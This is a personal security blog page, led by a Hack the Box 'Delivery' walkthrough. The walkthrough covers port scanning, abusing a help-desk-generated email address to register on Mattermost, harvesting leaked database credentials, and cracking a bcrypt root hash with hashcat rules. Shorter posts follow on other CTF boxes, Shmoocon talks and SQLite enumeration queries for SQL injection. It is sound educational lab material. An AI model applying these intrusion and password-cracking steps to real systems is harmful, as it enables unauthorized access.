Category: Uncategorized

Hack the Box – Delivery

Delivery was an easy-rated Linux box by ippsec. Despite being an easy box, it had a clever path to user that relies on hacking business processes, rather than software to get to user, and tries to teach something about hashcat to escalate to root.

Initial Enumeration

An initial nmap showed ports 22, 80 and 8065 open

root@kali-e:/home/jmpalk/htb/delivery# nmap -v -n -Pn 10.10.10.222 -p1-65535
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-12 15:25 EDT
Initiating SYN Stealth Scan at 15:25
Scanning 10.10.10.222 [65535 ports]
Discovered open port 80/tcp on 10.10.10.222
Discovered open port 22/tcp on 10.10.10.222
Discovered open port 8065/tcp on 10.10.10.222
Completed SYN Stealth Scan at 15:25, 13.52s elapsed (65535 total ports)
Nmap scan report for 10.10.10.222
Host is up (0.023s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8065/tcp open  unknown

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 13.65 seconds
           Raw packets sent: 65591 (2.886MB) | Rcvd: 65535 (2.621MB)
root@kali-e:/home/jmpalk/htb/delivery#

Port 80 is the splash page for the delivery service. There’s not a lot there beyond the contact us blurb, which points toward the Help Desk, located at helpdesk.delivery.htb and the Mattermost server, which is the service running on port 8065.

The "contact us" block on delivery.htb, reading "For unregistered users, please use our HelpDesk to get in touch with our team. Once you have an @delivery.htb email address, you'll be able to have access to our MatterMost server.
THis is critical information

Going to the helpdesk page, you can submit tickets via the osticket ticketing system, even without having an account.

The osticket-based help desk system
You an submit a ticket via osticket

The MatterMost server requires you to have a @delivery.htb address in order to be able to register

The Mattermost chat system signin page
Access to MatterMost requires an @delivery.htb email address

Initial foothold

The Contact Us dialog on the landing page gives the key to getting into the box. I need a ‘@delivery.htb’ address to access MatterMost. But how to get that email address? The Help Desk will give me one.

I started by creating a ticket. The content of the ticket doesn’t matter.

Image of a ticket being submitted to the delivery.htb osticket instance
What I put in the ticket isn’t as important as what osticket puts in the ticket.

The key bit is what happens once I submit the ticket.

A ticket creation confirmation, including a note "if you want to add more information to your ticket, just email to 5213117@delivery.htb"
Thank you, osticket, for creating an @delivery.htb email address

Osticket creates an email address – 5213117@delivery.htb – that I can send updates to. Taking that address over to Mattermost, I can use it to create an account.

Creating a Mattermost account with the osticket-supplied email address.
Creating a Mattermost account with the osticket email address

Once I create the account, Mattermost informs me I need to visit an account validation link it sent to my email address. Osticket helpfully receives the email and displays it to me when I check the status on my ticket.

The Mattermost account validation email as an update to my helpdesk ticket
Thanks for taking messages for me, osticket!

I copy the link into my browser, hit enter, and my Mattermost account is validated and ready to go.

Mattermost showing that my account emaill address has been verified.
Ready to log into my new Mattermost account

Logging into Mattermost and joining the System team immediately provides some interesting information.

A Mattermost conversation showing themaildeliverer account password as "Youve_G0t_Mail!", and a warning not to use passwords with a variant of "PleaseSubscribe" as they're vulnerable to bruteforce attacks with hashcat rules.
Credentials for the box, and additional password guidance

The credentials for the box get me right in, and user.txt is right there.

jmpalk@kali-e:~/htb/delivery$ ssh maildeliverer@delivery.htb
The authenticity of host 'delivery.htb (10.10.10.222)' can't be established.
ECDSA key fingerprint is SHA256:LKngIDlEjP2k8M7IAUkAoFgY/MbVVbMqvrFA6CUrHoM.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'delivery.htb,10.10.10.222' (ECDSA) to the list of known hosts.
Enter passphrase for key '/home/jmpalk/.ssh/id_rsa': 
maildeliverer@delivery.htb's password: 
Linux Delivery 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jan  5 06:09:50 2021 from 10.10.14.5
maildeliverer@Delivery:~$

Root

From the Mattermost comment, I have a good idea of what the password is going to look like, and that I’m going to need a hash to crack. This cuts my enumeration down substantially. I’m looking for notes, scripts and config files that might have passwords. Looking around the filesystem, I find the Mattermost config file at /opt/mattermost/config/config.json. It’s got a pretty big hint right in it.


"SqlSettings": {
        "DriverName": "mysql",
        "DataSource": "mmuser:Crack_The_MM_Admin_PW@tcp(127.0.0.1:3306)/mattermost?charset=utf8mb4,utf8\u0026readTimeout=30s\u0026writeTimeout=30s",
        "DataSourceReplicas": [],
        "DataSourceSearchReplicas": [],
        "MaxIdleConns": 20,
        "ConnMaxLifetimeMilliseconds": 3600000,
        "MaxOpenConns": 300,
        "Trace": false,
        "AtRestEncryptKey": "n5uax3d4f919obtsp1pw1k5xetq1enez",
        "QueryTimeout": 30,
        "DisableDatabaseSearch": false
    },

Using the provided username and password to log into MySQL, I query the user table.

Results of 'SELECT Username, Password FROM mattermost.Users'; Including a root user and hash.
Hey – look! A root user with password hash!

There’s a root hash in there. Feeding it into HashID, it comes back as blowfish, which is type 3200 in hashcat. The Mattermost note was warning people against using passwords vulnerable to hashcat rules. Hashcat rules allow one to programatically modify passwords being guessed, doing things like giving all the ‘leetspeak variations of words in a dictionary. You can come up with your own rules, but in this case, I used ‘best64’, one of the pre-written rules hashcat ships with.

PS C:\Program Files (x86)\hashcat-6.0.0> .\hashcat.exe -m 3200 .\delivery_hash.txt .\delivery-wl.txt -r .\rules\best64.rule
hashcat (v6.0.0) starting...

OpenCL API (OpenCL 2.1 AMD-APP (3075.13)) - Platform #1 [Advanced Micro Devices, Inc.]
======================================================================================
* Device #1: Ellesmere, 8128/8192 MB (6745 MB allocatable), 36MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 72

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 77

Applicable optimizers:
* Zero-Byte
* Single-Hash
* Single-Salt

Watchdog: Temperature abort trigger set to 90c

$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO:PleaseSubscribe!21

Session..........: hashcat
Status...........: Cracked
Hash.Name........: bcrypt $2*$, Blowfish (Unix)
Hash.Target......: $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v...JwgjjO
Time.Started.....: Thu May 13 11:24:48 2021 (35 secs)
Time.Estimated...: Thu May 13 11:25:23 2021 (0 secs)
Guess.Base.......: File (.\delivery-wl.txt)
Guess.Mod........: Rules (.\rules\best64.rule)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:        1 H/s (6.41ms) @ Accel:1 Loops:4 Thr:8 Vec:1
Recovered........: 1/1 (100.00%) Digests
Progress.........: 21/77 (27.27%)
Rejected.........: 0/21 (0.00%)
Restore.Point....: 0/1 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:20-21 Iteration:1020-1024
Candidates.#1....: PleaseSubscribe!21 -> PleaseSubscribe!21
Hardware.Mon.#1..: Util:  5% Core:1347MHz Mem:2000MHz Bus:16

Started: Thu May 13 11:24:42 2021
Stopped: Thu May 13 11:25:24 2021

It came back with a hit in about 42 seconds: “PleaseSubscribe!21”. Going back to my shell, I su’d to root, and it was done.

maildeliverer@Delivery:/opt/mattermost/config$ su
Password: 
root@Delivery:/opt/mattermost/config# cd
root@Delivery:~# ls
mail.sh  note.txt  py-smtp.py  root.txt
root@Delivery:~# cat root.txt
bXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXa
root@Delivery:~#

Again, a clever little path to user, and doing something I hadn’t done before with hashcat rules. Thanks, ippsec!

-30-

HackTheBox Walkthrough: Writeup

Writeup was a box listed as “easy” on Hackthebox.eu. While it was technically easy, its use of fail2ban had the potential to slow down one’s progress toward user, and getting the root flag required careful enumeration under particular circumstances.

Continue reading “HackTheBox Walkthrough: Writeup”

Hack the Box: Querier Walkthrough

Querier was an ‘medium’-rated machine on Hack the Box that required attackers to harvest files from unsecured SMB shells, and capture database credentials off the wire to get a toehold on the system, and then carefully enumerate the box to find admin credentials to finally pwn the system.

Continue reading “Hack the Box: Querier Walkthrough”

Shmoocon

So, I went to Shmoocon for the first time this year, and I had a blast. Met some good people and saw a lot of great talks. A few highlights:

  • Stephen Breen of FoxGlove Security showed how to chain together a series of existing Windows vulnerabilities to build a new privilege escalation exploit based on the Windows network broadcast name service (NBNS)
  • Jay Beale of InGuardians gave a great talk on using Docker containers to limit attacks on apps
  • Mandiant’s Matt Dunwoody and Nick Carr provided a postmortem on a massive breach they’d recently had to contain and remediate. Key takeaways: as an incident responder, your operational tempo has to outpace the attacker, and if you’ve got PowerShell in your environment, upgrade to v4 to take advantage of the logging capabilities

The links above point to the Shmoocon schedule; I’ll add links to the slides as they become available.

Update: videos are available here.

Finding tables and columns in Sqlite

On a recent capture-the-flag event, I came across a web app that had a somewhat troublesome SQL injection vulnerability. Identifying that the query was vulnerable was easy enough, but fingerprinting the underlying database was troublesome. No matter what I tried to do to find the version or even just identify tables, usernames, etc. using standard MySQL and PostgreSQL queries and tables, I kept getting errors.

Eventually, it occurred to me to try sqlite, which is what it turned out to be. The really frustrating thing was a most of the sql injection references I found didn’t deal with sqlite, and developer tips for finding database metadata focused on using commands in the sqlite command-line tool, rather than SQL queries. Eventually I found a post on stackoverflow that gave me the SQL I needed to find the data I was looking for.

Finding the sqlite version:

SELECT sqlite_version();

Finding tables and columns:

SELECT name FROM sqlite_master WHERE type = ‘table’;

 

 

SANS Holiday Hack Challenge 2015 Solution

SANS had an excellent Holiday Hack challenge this year, full of firmware analysis, web app hacking and exploit development. I’ve been trying these for the past few years, and for the first time, I was able to complete the entire thing. Here’s the PDF of my solution, it’s kind of a rush job. In a couple of days I should have time to pretty it up and make it into a proper post here. Cheers.